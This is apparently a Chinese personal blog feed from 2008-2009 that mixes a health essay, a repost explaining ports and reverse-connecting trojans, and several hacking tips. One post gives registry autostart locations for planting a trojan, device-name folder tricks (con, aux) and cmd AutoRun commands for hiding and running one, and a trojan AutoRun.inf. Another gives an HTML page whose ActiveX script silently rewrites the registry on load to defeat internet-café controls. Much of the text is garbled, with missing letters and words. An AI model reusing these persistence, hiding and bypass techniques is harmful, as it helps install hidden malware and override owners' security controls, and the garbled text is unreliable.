.__ 労z永遠是妳模仿不起的侽秂.
( Thu, 16 Jul 2009 15:03:42 +0800 )
Description:
也许当您看到这篇文章的标题后,会不屑一顾,但是当您若干年后,发现
已经透支的时候,您才会发现健康原来是多么的重要…… 看到越来越多的人,拿着自己的身体瞎折腾,拿着自己的身体瞎透支,也许您认为对于自己身强力壮的身体,这点小事不算什么……因为您年轻,正是气血旺盛的时候,您当然不感觉自己的身体正处于亏损当中。我朋友说过一句话:“30岁前你找病,30岁后病找你……” 这句话我在一个中医朋友那里得到了印证:他那里常去看病的人大多都是30岁以后的一些人,而且一些病症都差不多,肾虚,中气不足,肝肾阴虚,四肢乏力……等等,女性还有一些常见的妇科疾病…… 自己的身体,不要拿着开玩笑,您开不起的……健康需要自己来维持,虽然有一些药有很好的治疗效果,但是你别忘了,是药三分毒;健康还需要从现在开始…… 说了这么多,我要说的养生之路还并未开始, 我从小都是体弱多病,还有一种很多医院都不明白是怎么回事的病(目前为止,这个东西还没给我带来任何不好的地方),甚至他们都没见过的病,我妈妈带着我求医无数,但是结果一无所获……后来我根本就不想继续在求医,直到有一次我发了高烧,我小姨带我去看了一个中医,结果把高烧退了以后。第二去找他的时候,他告诉我,我这个是先天元气不足,而导致后天一些机体的免疫低下,于是他使用一些滋补气血的中药给我,我吃了以后,是有一点效果,但是不是很明显(这里只是单纯的身体强度有所改善,但是我说的那种病并没有什么起色),我平时没病的时候都去他那里看看,和他聊聊天,他告诉我,一个人,不管有什么病,想要治好的话,首先心态要好;平且他教我了一些不错的东西。我很谢谢他。 后来我慢慢地不去注意自己身体的变化了,时常拿着一些道家养生的书在看,我感觉里面说的和那个中医说的很像,道家说肾藏精,肾藏真元之气,炼精气,精气旺盛,人体经络就畅通,气血旺盛,人体就健康长寿,百病不生。但是又不知从何练起!于是就在
上找,终于在一些道家
里找到了一些东西,还认识了一些朋友,他们建议我先去清静心这个网站里看一些田成阳道长的文章……于是到后来认识了道家的丹道,还有一些养生之法,知道了养身和生活是紧密联系起来的,于是总保持着“有事应事,无事守心”的心境,一直到现在我发现我的心性有了一定变化,以前我觉得有时候我心很小,非常好面子……现在我感觉比以前好得多。总的来说,就应了那个中医说的心态要放正,恩,不管做什么事情,心态都必须放正,呵呵。 我不在为了我的一些身体的毛病而在社会上忙忙碌碌,也许我看开了,也许我根本就不在乎什么,也许年龄慢慢增大,知道的东西多了,反而不再那么多奇了…… 现在我平时没事的时候,也会去
这个网站看看文章,里面有些养生的方法,包括道家丹道养生之法……平时去去修真吧,气功世界,漏尽阁这些地方看看帖,我不求成仙得道,我只希望用此法来养生。 呵呵,也许我的养生之路还很长,但是我会一直坚持下去,这个贴,也许是讲述了我自己的一些
,或者讲述了什么……同时建议看到本帖的朋友也注意一下自己的身体,健康往往是最重要的。呵呵!
转帖此文章,请注明出处,谢谢:
中医养生网
( Fri, 27 Feb 2009 19:58:51 +0800 )
Description:
看到这个题目你也许有些奇怪,怎么把这几个词放在了一起,其实谈起端口和木马都是老生常谈了,但即使是常谈还有很多人的计算机被“冲击波”冲过之后又被“震荡波”狠狠地震了一下,看来很有必要再谈谈老话题,免得再被什么波温柔地扫过。其实说这些最终的目的就是为了保证计算机的上网安全。
一、 端口
一)、端口的一般含义
说到端口,这确实是个老话题,但一切都是从它开始的,不得不说。何谓端口,打个比方,你住在一座房子里,想让别人来拜访你,得在房子上开个大门,你养了个可爱的小猫,为了它的进出,专门给它修了个小门,为了到后花园,又开了个后门……所有这些为了进到这所房子里而开的门我们叫它端口,这些为了别人进来而开的端口称它为'服务端口'。
你要拜访一个叫张三的人,张三家应该开了个允许你来的门____服务端口,否则将被拒之门外。去时,首先你在家开个'门',然后通过这个'门'径直走进张三家的大门。为了访问别人而在自己的房子开的'门',我们称它为'客户端口'。它是随机开的而且是主动打开的,访问完就自行关闭了。它和服务端口性质是不一样的,服务端口是开了个门等着别人来访问,而客户端口是主动打开一个门去打开别人的门,这点一定要清楚。
下面我们从专业的角度再简单解释一下端口的概念。联网的计算机要能相互通信必须用同一种协议,协议就是计算机通信的语言,计算机之间必须说一种语言才能彼此通信,Internet的通用语言是TCP/TP,它是一组协议,它规定在网络的第四层运输层有两种协议TCP、UDP。端口就是这两个协议打开的,端口分为源端口和目的端口,源端口是本机打开的,目的端口是正在和本机通信的另一台计算机的端口,源端口分主动打开的客户端口和被动连接的服务端口两种。在Internet中,你访问一个网站时就是在本机开个端口去连网站服务器的一个端口,别人访问你时也是如此。也就是说计算机的通讯就像我们互相串门一样,从这个门走进哪个门。
当你装好系统后默认就开了很多'服务端口'。如何知道自己的计算机系统开了那些端口呢?这就是下面要说的:
二)、查看端口的方法
1、命令方式
下面以Windows XP为例看看新***的系统都开了那些端口,也就是说都预留了那些门,不借助任何工具来查看端口的命令是netstat,方法如下:
a、在'开始'的'运行'处键入cmd,回车
b、在dos命令界面,键入netstat -na,Proto代表协议,有TCP和UDP两种协议。Local Addre 代表本机地址,该地址冒号后的数字就是开放的端口号。Foreign re 代表远程地址,如果和其它机器正在通信,显示的就是对方的地址,State代表状态,显示的
LISTENING表示处于侦听状态,就是说该端口是开放的,等待连接,但还没有被连接。就像你房子的门已经敞开了,但此时还没有人进来。以第一行为例看看它的意思。
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
这一行的意思是本机的135端口正在等待连接。注意:只有TCP协议的服务端口才能处于LISTENING状态。
2、用TCPView工具
为了更好的分析端口,最好用TCPView这个软件,该软件很小只有93KB,而且是个绿色软件,不用***。
第一次显示时字体有些小,在'Optio '-'Font'中将字号调大即可。TCPView显示的数据是动态的。Local Addre 显示的就是本机开放的哪个端口(:号后面的数字),TCPView可以看出哪个端口是由哪个程序发起的。445、139、1025、135、5000等端口是开放的,445、139等端口都是system发起的,135等都是SVCHOST发起的。
三)、研究端口的目的:
1、知道本机开了那些端口,也就是可以进入到本机的'门'有几个,都是谁开的?
2、目前本机的端口处于什么状态,是等待连接还是已经连接,如果是已经连接那就要特别注意看连接是个正常连接还是非正常连接(木马等)?
3、目前本机是不是正在和其它计算机交换数据,是正常的程序防问到一个正常网站还是访问到一个陷阱?
当你上网时就是本机和其它机器传递数据的过程,要传递数据必须要用到端口,即使是有些非常高明的木马利用正常的端口传送数据也不是了无痕迹的,数据在开始传输、正在传输和结束传输的不同阶段都有各自的状态,要想搞明白上述3个问题,就必须清楚端口的状态变化。下面结合实例先分析服务端口的状态变化。只有TCP协议才有状态,UDP协议是不可@@传输,是没有状态的。
四)、服务端口的状态变化
先在本机(IP地址为:192.168.1.10)配置FTP服务,然后在其它计算机(IP地址为:192.168.1.1)访问FTP服务,从TCPView看看端口的状态变化。
下面是从TCPView中截取的部分。
1、LISTENING状态
FTP服务启动后首先处于侦听(LISTENING)状态。
State显示是LISTENING时表示处于侦听状态,就是说该端口是开放的,等待连接,但还没有被连接。就像你房子的门已经敞开的,但还没有人进来。
从TCPView可以看出本机开放FTP的情况。它的意思是:程序inetinfo.exe开放了21端口,FTP默认的端口为21,可见在本机开放了FTP服务。目前正处于侦听状态。
inetinfo.exe:1260 TCP 0.0.0.0:21 0.0.0.0:0 LISTENING
2、ESTABLISHED状态
现在从192.168.1.1这台计算机访问一下192.168.1.10的FTP服务。在本机的TCPView可以看出端口状态变为ESTABLISHED。
ESTABLISHED的意思是建立连接。表示两台机器正在通信。
下面显示的是本机的FTP服务正在被192.168.1.1这台计算机访问。
inetinfo.exe:1260 TCP 192.168.1.10:21 192.168.1.1:3009 ESTABLISHED
注意:处于ESTABLISHED状态的连接一定要格外注意,因为它也许不是个正常连接。后面我们要讲到这个问题。
3、 TIME_WAIT状态
现在从192.168.1.1这台计算机结束访问192.168.1.10的FTP服务。在本机的TCPView可以看出端口状态变为TIME_WAIT。
TIME_WAIT的意思是结束了这次连接。说明21端口曾经有过访问,但访问结束了。
[System Proce ]:0 TCP 192.168.1.10:21 192.168.1.1:3009 TIME_WAIT
4、小技巧
a、可以telnet一个开放的端口,来观察该端口的变化。比如看1025端口是开放的,在命令状态运行:
telnet 192.168.1.10 1025
b、从本机也可以测试,只不过显示的是本机连本机
c、在Tcpview中双击连接可看出程序的位置,右键点击该连接,选择End Proce 即可结束该连接
五)、客户端口的状态变化
客户端口实际上就是从本机访问其它计算机服务时打开的源端口,最多的应用是上网,下面就以访问baidu.com为例来看看端口开放以及状态的变化情况。
1、SYN_SENT状态
SYN_SENT状态表示请求连接,当你要访问其它的计算机的服务时首先要发个同步信号给该端口,此时状态为SYN_SENT,如果连接成功了就变为ESTABLISHED,此时SYN_SENT状态非常短暂。但如果发现SYN_SENT非常多且在向不同的机器发出,那你的机器可能中了冲击波或震荡波之类的病毒了。这类病毒为了感染别的计算机,它就要扫描别的计算机,在扫描的过程中对每个要扫描的计算机都要发出了同步请求,这也是出现许多SYN_SENT的原因。
下面显示的是本机连接baidu.com网站时的开始状态,如果你的网络正常的,那很快就变为ESTABLISHED的连接状态。
IEXPLORE.EXE:2928 TCP 192.168.1.10:1035 202.108.250.249:80 SYN_SENT
2、ESTABLISHED状态
下面显示的是本机正在访问baidu.com网站。如果你访问的网站有许多内容比如访问[url]www.yesky.com[/url],那会发现一个地址有许多ESTABLISHED,这是正常的,网站中的每个内容比如图片、flash等都要单独建立一个连接。看ESTABLISHED状态时一定要注意是不是IEXPLORE.EXE程序(IE)发起的连接,如果是EXPLORE.EXE之类的程序发起的连接,那也许是你的计算机中了木马了。
IEXPLORE.EXE:3120 TCP 192.168.1.10:1045 202.108.250.249:80 ESTABLISHED
3、TIME_WAIT状态
如果浏览网页完毕,那就变为TIME_WAIT状态。
[System Proce ]:0 TCP 192.168.1.10:4259 202.108.250.249:80 TIME_WAIT
七)、要点
一般用户一定要熟悉(再啰嗦几句):
1、服务端口重点要看的是LISTENING状态和ESTABLISHED状态,LISTENING是本机开了哪些端口, ESTABLISHED是谁在访问你的机器,从哪个地址访问的。
2、客户端口的SYN_SENT状态和ESTABLISHED状态,SYN_SENT是本机向其它计算机发出的连接请求,一般这个状态存在的时间很短,但如果本机发出了很多SYN_SENT,那可能就是中毒了。看ESTABLISHED状态是要发现本机正在和哪个机器传送数据,主要看是不是一个正常程序发起的。
二、木马
什么是木马,简单的说就是在未经你许可偷偷在你的计算机中开个后门,木马开后门主要有两种方式。
1、有服务端口的木马,这类木马都要开个服务端口的后门,成功后该后门处于LISTENING状态,它的端口号可能固定一个数,也可能变化,还有的木马可以与正常的端口合用,例如你开着正常的80端口(WEB服务),木马也用80端口。这种木马最大的特点就是有端口处于LISTENING状态,需要远程计算机连接它。这种木马对一般用户比较好防范,将防火墙设为拒绝从外到内的连接即可。比较难防范的是反弹型木马。
2、反弹型木马,反弹型木马是从内向外的连接,它可以有效的穿透防火墙,而且即使你使用的是内网IP,他一样也能访问你的计算机。这种木马的原理是服务端主动连接客户端(黑客)地址。木马的服务端软件就像你的Internet Explorer一样,使用动态分配端口去连接客户端的某一端口,通常是常用端口,像端口80。而且会使用隐避性较强的文件名,像iexpiore.exe、explorer(IE的程序是IEXPLORE.EXE)。如果你不仔细看,你可能会以为是你的Internet Explorer。这样你的防火墙也会被骗过。如果你在TcpView中看到下面这样的连接一定要注意,很有可能是种木马了。 iexpiore.exe 192.168.1.10(本机IP):1035(你的端口) Y.Y.Y.Y(远程IP):80(远程端口)
或 Rundll32.exe 192.168.1.10(本机IP):1035(你的端口) Y.Y.Y.Y(远程IP):80(远程端口)
或 explorer.exe 192.168.1.10(本机IP):1035(你的端口) Y.Y.Y.Y(远程IP):80(远程端口)
三、安全
我们分析端口的目的就是要保证上网安全,根据以上的思路可以从以下几个方面来防范。
一)、关闭不需要的端口
对一般上网用户来说只要能访问Internet就行了,并不需要别人来访问你,也就是说没有必要开放服务端口,在WIN 98可以做到不开放任何服务端口上网,但在Win XP、Win 2000、Win 2003下不行,但可以关闭不必要的端口。
1、关闭137、138、139、445端口
这几个端口都是为共享而开的,是NetBios协议的应用,一般上网用户是不需要别人来共享你的内容的,而且也是漏洞最多的端口。关闭的方法很多,最近从网上学了一招非常好用,一次全部关闭上述端口。
开始- 控制面板- 系统- 硬件- 设备管理器- 查看- 显示隐藏的设备- 非即插即用驱动程序- Netbios over Tcpip。
禁用该设备重新启动后即可。
2、关闭123端口
有些蠕虫病毒可利用UDP 123端口,关闭的方法:停止windows time服务。
3、关闭1900端口
攻击者只要向某个拥有多台Win XP系统的网络发送一个虚假的UDP包,就可能会造成这些Win XP主机对指定的主机进行攻击(DDoS)。另外如果向该系统1900端口发送一个UDP包,令'Location'域的地址指向另一系统的chargen端口,就有可能使系统陷入一个死循环,消耗掉系统的所有资源(需要***硬件时需手动开启)。
关闭1900端口的方法:停止SSDP Discovery Service 服务
通过上面的办法关闭了一些有漏洞的或不用的端口后是不是就没问题了呢?不是。因为有些端口是不能关掉的。像135端口,它是RPC服务打开的端口如果把这个服务停掉,那计算机就关机了,同样像Lsa 打开的端口500和4500也不能关闭。冲击波病毒利用的就是135端口,对于不能关闭的端口最好的办法一是常打补丁,端口都是相应的服务打开的,但是对于一般用户很难判断这些服务到底有什么用途,也很难找到停止哪些服务就能关闭相应的端口。最好的办法就是下面我们要讲的***防火墙。***防火墙的作用通俗的说就像你不管住在一所结实的好房子里还是住在一所千疮百孔的破房子里,只要你在房子的四周建了一堵密不透风的墙,那对于墙里的房子就是安全的。
二)、***防火墙
对于一般用户来讲有下面三类防火墙
1、 自带的防火墙
关于Win XP 与Win 2003自带防火墙的设置请参阅天极网中拙作,不再赘述。
2、ADSL猫防火墙
通过ADSL上网的,如果有条件最好将ADSL猫设置为地址转换方式(NAT),也就是大家常说的路由模式,其实路由与NAT是不一样的,权且这么叫吧。用NAT方式最大的好处是设置完毕后,ADSL猫就是一个放火墙,它一般只开放80、21、161等为了对ADSL猫进行设置开放的端口。如果不做端口映射的话,一般从远程是攻击不到ADSL猫后面的计算机的。ADSL猫最大的安全隐患就是很多用户都不改变默认密码。这样黑客如果进到你的猫做个端口映射就有可能进入到你的计算机,一定把默认密码改掉。
用自带的放火墙和ADSL猫的NAT方式基本可以抵御从外到内的攻击,也就是说即使服务端口开放(包括系统开放的端口和中了开个服务端口的木马),黑客和类似震荡波一类的病毒也奈何不了你的计算机。上述防火墙只能防止从外到内的连接,不能防止从内到外的连接,当你打开网页和用QQ聊天时就是从内到外的连接,反弹型木马就是利用放火墙的这一特性来盗取你机器的数据的。反弹型木马虽然十分隐蔽,但也不是没有马脚,防范这类木马最好的办法就是用第三方防火墙。
3、第三方防火墙
前面说过,反弹型木马而且会使用隐避性较强的文件名,像iexpiore.exe、explorer等与IE的程序IEXPLORE.EXE很想的名字或用一些rundll32之类的好像是系统文件的名字,但木马的本质就是要与远程的计算机通讯,只要通讯就会有连接。如下所示:正常连接是IEXPLORE.EXE发起的,而非正常连接是木马程序explorer发起的。
一般的防火墙都有应用程序访问网络的权限设置,在防火墙的这类选项中将不允许访问网络的应用程序选择X,即不允许访问网络。
在写这篇文章之前我中了一个反弹型木马,就是explorer程序向外连接,用了好几个查毒软件也没有杀掉,当时就先用天网放火墙阻止它访问网络,然后手工费了很大的劲才清除掉。可惜没有做截图。没有勇气为了写这篇文章再牺牲一把了。
4、用Tcpview结束一个连接
当你用Tcpview观察哪个连接有可能是不正常的连接,可在Tcpview中直接鼠标右键点击该连接,选择End Proce 即可结束该连接。
四、扫描
谈起扫描又是个大话题了,有端口扫描(Superscan)、漏洞扫描(X-scan)等,关于扫描的话题以后再论,本文只对一般用户简单说一下在线安全检测。如果你按上面的说得作了相应的安全措施,就可以在网上找个在线测试安全的网站测试一下你目前系统的安全情况,如到下面网站:
1、千禧在线--在线检测
2、蓝盾在线检测
3、天网安全在线
4、诺顿在线安全检测
说明一点,测试我的机器时开了21、23、80端口,但这都是ADSL的服务端口,我的猫没有提供修改和关闭的地方,不过没关系,只要把密码设的复杂点就行了。
五、震荡波
如果你按上述关闭了445端口或者开启了放火墙那就不会受到震荡波及类似的病毒骚扰了,关于震荡波病毒的文章太多了,我就不在这啰嗦了。只要做好了安全防护,不管是震荡大波还是冲击小波只能在你的计算机门前掠过而奈何不了你。
六、后记
关于计算机的安全还有很多要设置,但对于一般用户来说,太多的安全设置就等于没有了安全,因为即使对于专业从事计算机安全的人员对于安全的设置也不是件容易的事,何况对于对计算机的知识还不够的一般用户。如果要作很多设置才能保证安全,那肯定就有很多人不做了。对一般用户我的建议是力所能及的事一定要做,比如:
1、上网时一定要***防病毒软件并及时升级。
2、至少***一个防火墙,ADSL用户最好用路由方式上网,改掉默认密码。
3、经常打补丁,Windows用户最好将系统设为自动升级。
4、自己要做的就是用Tcpview 常常看看连接,防止反弹型木马。常常看看,时间长了也许就看成专家了。
5、Udp协议是不可@@传输,没有状态,从Tcpview中很难看出它是不是在传输数据,感兴趣的朋友可以用iris、 iffer这类的协议分析工具看看是不是有Udp的数据。关于这个话题以后再聊。
6、本文题目起的很大,但写起来又觉得很多问题都是别人说了再说的,也就没有深谈。
道高一尺,魔高一丈。网络安全将是一个永恒的话题,没有绝对的安全,但有了防范意识总比敞开了大门还不知道好吧。
本篇文章来源于 黑客手册
( Fri, 27 Feb 2009 19:56:57 +0800 )
Description:
-------1-----------------
Hkey_current_user/software/microsoft/windows nt/currentversion /windows 建一个字符串名为load键值为自启动程序的路径但是要注意短文件名规则,如c:/program files 应为c:/progra~1
这种方式用优化大师看不到
----------2--------------------
另一个注册表可以加启动项的位置
HKEY_LOCAL_MACHINE/SHOFTWARE/Microsoft/WindowsNT/CurrentVersion/Winlogon 里面的shell建值在Explorer.exe的后面加上我门程序的路径 这样我门的程序就可以随系统启动了。
比如我门的c:/windows/system32/下有个hehe.exe木马。
-------3-------------------------
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/WindowsNT/CurrentVersion/Winlogon,找到“Userinit”这个键值,这个键值默认为c:/WINNT/system32/userinit.exe,后面加路径,再加逗号也可以
木马对文件关联的利用
我们知道,在注册表HKEY_LOCAL_MACHINE SoftwareMicrosoftWindowsCurrentVersionRun下可以加载程序,使之开机时自动运行,类似“Run”这样的子键在注册表中还有几处,均以“Run”开头,如RunOnce、RunServices等。除了这种方法,还有一种修改注册表的方法也可以使程序自启动。
具体说来,就是更改文件的打开方式,这样就可以使程序跟随您打开的那种文件类型一起启动。举例来说,打开注册表,展开注册表到HKEY_CLASSES_ROOTexefileshell
opencommand,这里是exe文件的打开方式,默认键值为:“%1”%*。如果把默认键值改为Trojan.exe“%1”%*,您每次运行exe文件,这个Trojan.exe文件就会被执行。木马灰鸽子就采用关联exe文件的打开方式,而大名鼎鼎的木马冰河采用的是也与此相似的一招——关联txt文件。
对付这种隐藏方法,主要是经常检查注册表,看文件的打开方式是否发生了变化。如果发生了变化,就将打开方式改回来。最好能经常备份注册表,发现问题后立即用备份文件恢复注册表,既方便、快捷,又安全、省事。
木马对设备名的利用
大家知道,在Windows下无法以设备名来命名文件或文件夹,这些设备名主要有aux、com1、com2、prn、con、nul等,但Windows 2000/XP有个漏洞可以以设备名来命名文件或文件夹,让木马可以躲在那里而不被发现。
具体方法是:点击“开始”菜单的“运行”,输入cmd.exe,回车进入命令提示符窗口,然后输入md c:con/命令,可以建立一个名为con的目录。默认请况下,Windows是无法建立这类目录的,正是利用了Windows的漏洞我们才可以建立此目录。再试试输入md c:aux/命令,可以建立aux目录,输入md c:prn/可以建立prn目录,输入md c:com1/目录可以建立Com1目录,而输入md c: ul/则可以建立一个名为nul的目录。在资源管理器中依次点击试试,您会发现当我们试图打开以aux或com1命名的文件夹时,explorer.exe失去了响应,而许多“牧马人”就是利用这个方法将木马隐藏在这类特殊的文件夹中,从而达到隐藏、保护木马程序的目的。
现在,我们可以把文件复制到这个特殊的目录下,当然,不能直接在Windows中复制,需要采用特殊的方法,在CMD窗口中输入copy muma.exe /.c:aux/命令,就可以把木马文件muma.exe复制到C盘下的aux文件夹中,然后点击“开始”菜单中的“运行”,在“运行”中输入c:aux muam.exe,就会成功启动该木马。我们可以通过点击文件夹名进入此类特殊目录,不过,如果您要试图在资源管理器中删除它,会发现这根本就是徒劳的,Windows会提示找不到该文件。
由于使用del c:aux/命令可以删除其中的muma.exe文件,所以,为了达到更好的隐藏和保护效果,下木马者会把muma.exe文件也改名,让我们很难删除。具体方法就是在复制木马文件到aux文件夹时使用命令copy muma.exe /.c:con.exe,就可以把木马文件muma.exe复制到aux目录中,并且改名为con.exe,而con.exe文件是无法用普通方法删除的。
可能有的朋友会想,这个con.exe文件在“开始”菜单的“运行”中无法运行啊。其实不然,只要在命令行方式下输入cmd /c /.c:con就可以运行这个程序了。在运行时会有一个cmd窗口一闪而过,下木马者一般来说会对其进行改进,方法有很多,可以利用开机脚本,也可以利用cmd.exe的autorun:在注册表HKEY_LOCAL_ MACHINESoftwareMicrosoftCommand Proce or下建一个字串AutoRun,值为要运行的.bat文件或.cmd文件的路径,如c:wi tsystem32auto.cmd,如果建立相应的文件,它的内容为@/.c:con,就可以达到隐蔽的效果。
对于这类特殊的文件夹,发现后我们可以采用如下方法来删除它:先用del /.c:con.exe命令删除con.exe文件(该文件假设就是其中的木马文件名),然后再用rd /.c:aux命令删除aux文件夹即可。
好了,文章到这里就结束了。由于水平有限,文中如有不正确或值得商榷的地方欢迎大家批评指点,另外,写作时曾参阅过网上高手们的帖子,受益匪浅,在此一并谢过!
不过,AutoRun不仅能应用于光盘中,同样也可以应用于硬盘中(要注意的是,AutoRun.inf必须存放在磁盘根目录下才能起作用)。让我们一起看看AutoRun.inf文件的内容吧。
打开记事本,新建一个文件,将其命名为AutoRun.inf,在AutoRun.inf中键入以下内容:
[AutoRun]
Icon=C:WindowsSystemShell32.DLL,21
Open=C:Program FilesACDSeeACDSee.exe
其中,“[AutoRun]”是必须的固定格式,一个标准的AutoRun文件必须以它开头,目的是告诉系统执行它下面几行的命令;第二行“Icon=C:WindowsSystemShell32.DLL,21”是给硬盘或光盘设定一个个性化的图标,“Shell32.DLL”是包含很多Windows图标的系统文件,“21”表示显示编号为21的图标,无数字则默认采用文件中的第一个图标;第三行“Open=C:Program FilesACDSeeACDSee.exe”指出要运行程序的路径及其文件名。
如果把Open行换为木马文件,并将这个AutoRun.inf文件设置为隐藏属性,我们点击硬盘时就会启动木马。
为防止遭到这样的“埋伏”,可以禁止硬盘AutoRun功能。在“开始”菜单的“运行”中输入Regedit,打开注册表编辑器,展开到HKEY_CURRENT_USERSoftware MicrosoftWindowsCurrentVersionPoliciesExploer主键下,在右侧窗口中找到“NoDriveTypeAutoRun”,就是它决定了是否执行CDROM或硬盘的AutoRun功能。将其键值改为9D,00,00,00就可以关闭硬盘的AutoRun功能,如果改为B5,00,00,00则禁止光盘的AutoRun功能。修改后重新启动计算机,设置就会生效。
本篇文章来源于 黑客手册
( Fri, 27 Feb 2009 19:54:52 +0800 )
Description:
大家知道,有时候在网吧上网常常碰见网吧装了一些管理软件,那些软件对于网吧管理者来说确实是帮了不少忙,可是对于我们这些使用者来说有时候却觉得非常麻烦。不知道我下面的这句HTML语言对大家是否有帮助。
<A href="file:///::{208D2C60-3AEA-***-A2D7-08002B30309D}">显示:“
邻居” <A href="file:///::{20D04FE0-3AEA-***-A2D8-08002B30309D}">显示:“我的
”
<A href="file:///::{450D8FBA-AD25-11D0-98A8-0800361B1103}">显示:“我的文档”
<A href="file:///::{20D04FE0-3AEA-***-A2D8-08002B30309D}/::{21EC2020-3AEA-***-A
2DD-08002B30309D}">显示:“控制面板”
<A href="file:///::{645FF040-5081-101B-9F08-00AA002F954E}">显示:“回收站” R>
<A href="file:///c:/windows/system/显示桌面.scf">显示桌面
<A href="file:///c:/windows/command.com">输入命令,进入DOS环境
<A href="file:///c:/windows/regedit.exe">运行注册表
<A href="file:///c:/windows/taskman.exe">运行
(注意:点击链接后提示下载taskman.exe,下载后,打开
,再打开文件菜单,选“运行应用
”,就跟我们平时使用的“开始”->“运行”一样了)
把上面的这些东西拷贝到文字处理软件(如记事本)中,再存储为htm或者html为后缀名的文件,打开文件,我们就可以很方便地突破某些网吧管理软件的一些限制了,可惜的是我现在还没有自己的个人网页,希望看到这篇文章的那位读者把该文件传到网上,这样我们就可以实现在线破解了。
另外,如果机器的注册表被禁止了的话,再把下面的这些内容加上吧。
<SCRIPT language=java-script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent>
PPLET>");
function f(){
try
{
//ActiveX初始化过程(为达到修改用户注册表所必须的准备
a1=document.a lets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createI tance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createI tance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createI tance();
Net = a1.GetObject();
try
{
if (documents.cookie.indexOf("Chg") == -1)
//以下是检测用户注册表并修改相应的键值
{
Shl.RegWrite("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//Syste
m//DisableRegistryTools", "00000000", "REG_DWORD")
var expdate = new Date((new Date()).getTime() + (1));
documents.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);//实现打开页面后1秒钟内执行测试修改注册表的工作
}
init();
</SCRIPT>
( Sun, 5 Oct 2008 14:40:03 +0800 )
Description:
今天,我在网易花园里为shipjacker种了一朵小红花。希望它给我们带来幸福和爱,直到永远...
( Thu, 14 Aug 2008 18:09:39 +0800 )
Description:
前几天我们发表了一篇《肉鸡电脑的商业价值》一文,相信你再也不想把自己的电脑赤裸裸暴露在黑客面前。
我们势必需要经常性的检查自己的电脑是不是被入侵,如果发现入侵,就得想尽一切办法将木马程序清除出去,必要时,宁可格式化重装,也不给攻击者留下任何机会。
接下来,我们介绍一下“肉鸡”电脑的一些现象,提醒网友遇到这些现象时,要注意检查。文章的最后会介绍几个工具软件协助分析本机的安全性。
现象1:QQ、MSN的异常登录提醒
你在登录QQ时,系统提示上一次的登录IP和你完全不相干。比如,你明明就只在上海的家里上过,QQ却提醒你上一次登录地点在沈阳。
还有,当你登录MSN时,可能有朋友给你发消息,问你刚发了什么,你却很清楚自己从未给这个朋友发过什么消息。
现象2:网络游戏登录时发现装备丢失或和你上次下线时的位置不符,甚至用正确的密码无法登录。
很显然,你没有登录这个游戏的时候,别人替你登录过。
现象3:有时会突然发现你的鼠标不听使唤,在你不动鼠标的时候,鼠标也会移动,并且还会点击有关按钮进行操作。
你没动,那就是有人在动。注意,这种鼠标的移动轨迹和性能差光电鼠标自动漂移明显不同。你就能感觉到,这是有人在动你的电脑。
现象4:正常上网时,突然感觉很慢,硬盘灯在闪烁,就象你平时在COPY文件。
这种情况很可能是攻击者在尝试COPY你的文件,在大量COPY文件时,磁盘的读写明显会增加,系统也会变慢。此时,你应该毫不犹豫地拔掉网线,立即检查你的系统进程是否异常。
现象5:当你准备使用摄像头时,系统提示,该设备正在使用中。
完了,攻击者已经在盗用你的摄像头了,这种情况下,摄像头的工作状态是不可见的。
强烈建议你不用摄像头时,把镜头给盖上,攻击者看到黑乎乎的影像时,自然会明白是什么问题。
现象6:在你没有使用网络资源时,你发现网卡灯在不停闪烁。如果你设定为连接后显示状态,你还会发现屏幕右下角的网卡图标在闪。
正常情况下,当你少用或不用网络资源时,网卡的闪烁会不明显,通过网络传递的数据流量也不会太高。
以上现象,基本是主观感觉,并不十分准确,但需要提醒您注意。
接下来,我们可以借助一些软件来观察网络活动情况,以检查系统是否被入侵。
1.注意检查防火墙软件的工作状态
比如金山网镖。在网络状态页,会显示当前正在活动的网络连接,仔细查看相关连接。如果发现自己根本没有使用的软件在连接到远程计算机,就要小心了。
2.推荐使用tcpview,可以非常清晰的查看当前网络的活动状态。
一般的木马连接,是可以通过这个工具查看到结果的。
( Thu, 14 Aug 2008 18:06:47 +0800 )
Description:
微软于周二发布了本月的安全补丁,共计11个补丁,用于封堵26个
尽管这一数字较微软上周的预计略少,但McAfee安全研究员卡蒂克·拉曼(Karthik Raman)仍将此称为“补丁数量可观的星期二”.Shavlik的安全数据团队负责人简森·米勒(Jason Miller)则表示:“对于很多企业来说,这又是忙碌的一个月.”在这11个安全补丁当中,有6个被定位为“危急”(critical)级别,5个定位为“重要”(important)级别.如果以安全补丁所修复的漏洞数量来计,26个漏洞当中有17个可称为“危急”,这也是自2006年8月以来“危急 ”级别
最多的一次.
查看:Microsoft 安全公告摘要(2008 年 8 月) MS08-041公告(危急)修复Microsoft Acce (Office 2003及更高版本)的Sna hot Viewer当中ActiveX控件存在的一个的漏洞。MS08-042公告(重要)修复微软Word 2002和2003当中存在的
。McAfee表示,MS08-041公告和MS08-042公告均被
攻击者频繁利用。
MS08-043公告(Excel 2000用户为“危急”级别,更高版本的Excel用户为“重要”级别)修复微软Excel当中存在的漏洞。MS08-045公告(危急)修复微软IE浏览器中存在的6个漏洞。MS08-046公告(危急)修复微软Windows 2000、Windows XP和Windows Server 2003系统中存在的Image Color Management漏洞。简森·米勒表示,MS08-045和MS08-046中出现的漏洞应当尽快修复。米勒表示,
可利用这些漏洞创造一个恶意网站,而且存在
的网页浏览器可能受到感染。
MS08-047公告(重要)修复Windows Vista和Windows Server 2008系统当中的Windows IPSec(网络协议安全)存在的信息泄漏隐患。MS08-048公告(Windows 2000、XP和Vista系统用户为“重要”级别,Windows Server 2003和2008用户为“普通级别”)修复Outlook Expre 和Windows Mail中存在的信息泄漏隐患。
